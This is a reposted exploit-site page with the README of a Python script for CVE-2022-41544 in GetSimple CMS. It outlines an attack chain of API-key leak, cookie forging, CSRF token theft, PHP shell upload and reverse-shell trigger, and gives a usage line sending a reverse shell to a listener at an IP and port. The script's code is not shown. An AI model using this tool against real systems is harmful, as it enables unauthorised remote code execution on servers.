Exploit for CVE-2022-41544 exploit

3 months ago 18
BOOK THIS SPACE FOR AD
ARTICLE AD

Share

## https://sploitus.com/exploit?id=93BA804C-48AC-58E5-9427-8660285A4C4F # CVE-2022-41544 Exploit Script This repository contains a script to exploit CVE-2022-41544 vulnerability in GetSimple CMS. The script performs several steps to check for vulnerabilities, leak API keys, set cookies, obtain CSRF tokens, upload a shell, and trigger the shell. ## Changes and Improvements 1. **Deprecation Warning Handling**: Removed the deprecated `telnetlib` import as it was not necessary for the script's functionality. 2. **Enhanced Error Handling**: Added more robust error handling for HTTP requests and XML parsing. 3. **Improved User Feedback**: Provided detailed feedback for each step to help users understand the script's progress and any issues encountered. 4. **Input Validation**: Ensured that the user inputs for the target, path, and credentials are validated. 5. **Documentation and Comments**: Added comments and documentation to improve code readability and usability. ## Usage 1. **Clone the Repository**: ```bash git clone https://github.com/yourusername/CVE-2022-41544.git cd CVE-2022-41544 ``` 2. **Install Dependencies**: Ensure you have Python 3 installed along with the `requests` library. ```bash pip3 install requests ``` 3. **Run the Script**: ```bash python3 CVE-2022-41544.py <target> <path> <ip:port> <username> ``` - `<target>`: The target domain or IP address. - `<path>`: The path to the GetSimple CMS installation. - `<ip:port>`: The IP and port for the reverse shell. - `<username>`: The admin username for the GetSimple CMS. Example: ```bash python3 CVE-2022-41544.py 10.129.42.249 /CMS 10.10.14.8:4444 admin ``` ![image](https://github.com/user-attachments/assets/ddf85b4b-664c-4f88-8692-356cbe38b447) ![image](https://github.com/user-attachments/assets/31b056df-9df9-452f-94f2-a7ebd96c1576) ## Script Overview ### Functions - `print_the_banner()`: Displays a stylized banner using ASCII art. - `get_version(target, path)`: Checks if the target version of GetSimple CMS is vulnerable. - `api_leak(target, path)`: Attempts to retrieve an API key from an authorization XML file. - `set_cookies(username, version, apikey)`: Sets cookies required for further requests based on the retrieved API key. - `get_csrf_token(target, path, headers)`: Extracts a CSRF token necessary for uploading a shell. - `upload_shell(target, path, headers, nonce, shell_content)`: Uploads a PHP shell to the target server. - `shell_trigger(target, path)`: Triggers the uploaded shell to establish a reverse shell connection. ### Main Function The `main()` function orchestrates the entire process by calling the above functions in sequence to exploit the CVE-2022-41544 vulnerability. ## Author This script was developed by Dilanka Kaushal Hewage (**sp3c73rsh4d0w**). ## Disclaimer This script is provided for educational purposes only. Unauthorized access to systems is illegal and unethical. Use this script responsibly and only on systems you have explicit permission to test. ## License This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.
Read Entire Article